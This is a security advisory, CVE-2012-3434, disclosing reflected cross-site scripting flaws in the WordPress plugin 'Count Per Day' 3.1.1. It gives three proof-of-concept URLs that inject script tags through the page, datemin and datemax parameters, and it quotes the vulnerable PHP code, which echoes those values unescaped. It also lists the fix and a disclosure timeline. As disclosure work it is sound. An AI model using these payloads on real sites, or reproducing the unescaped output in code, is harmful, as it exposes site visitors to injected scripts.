SSCHADV2012-015 - WordPress Plugin 'Count Per Day' 3.1.1 Multiple Cross-site scripting vulnerabilities
Advisory:
|
WordPress Plugin ‘Count Per Day’ 3.1.1 Multiple Cross-site scripting vulnerabilities
|
Advisory ID:
|
SSCHADV2012-015
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on ‘Count Per Day’ 3.1.1
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
CVE-ID:
|
CVE-2012-3434
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
The WordPress plugin ‘Count Per Day’ 3.1.1’ is prone to multiple XSS vulnerabilities
==============
PoC-Exploit
==============
PoC-Exploit
==============
http://[target]/wp/wp-content/plugins/count-per-day/userperspan.php?page="/><script>alert(/xss/)</script>
http://[target]/wp/wp-content/plugins/count-per-day/userperspan.php?datemin="/><script>alert(/xss/)</script> http://[target]/wp/wp-content/plugins/count-per-day/userperspan.php?datemax="/><script>alert(/xss/)</script> |
==============
Vulnerable code
==============
Vulnerable code
==============
// userperspan.php
<form action="" method="post">
<p style="background:#ddd; padding:3px;"> <?php _e(‘Start’, ‘cpd’); ?>: <input type="text" name="datemin" value="<?php echo $cpd_datemin; ?>" size="10" /> <?php _e(‘End’, ‘cpd’); ?>: <input type="text" name="datemax" value="<?php echo $cpd_datemax; ?>" size="10" /> <?php _e(‘PostID’, ‘cpd’); ?>: <input type="text" name="page" value="<?php echo $cpd_page; ?>" size="5" /> <input type="submit" value="<?php _e(‘show’, ‘cpd’) ?>" /> </p> </form> |
==============
Solution
==============
==============
Upgrade to the latest version 3.2
================
Disclosure Timeline
================
29-Jun-2012 – developer informed (contact form)
Disclosure Timeline
================
29-Jun-2012 – developer informed (contact form)
02-Jul-2012 – verified by Meistar
03-Jul-2012 – feedback from developer
03-Jul-2012 – feedback from developer
14-Jul-2012 – fixed by developer
==============
Credits
==============
Vulnerabilities found and advisory written by Stefan Schurtz.
==============
References
==============
Comments
Display comments as Linear | Threaded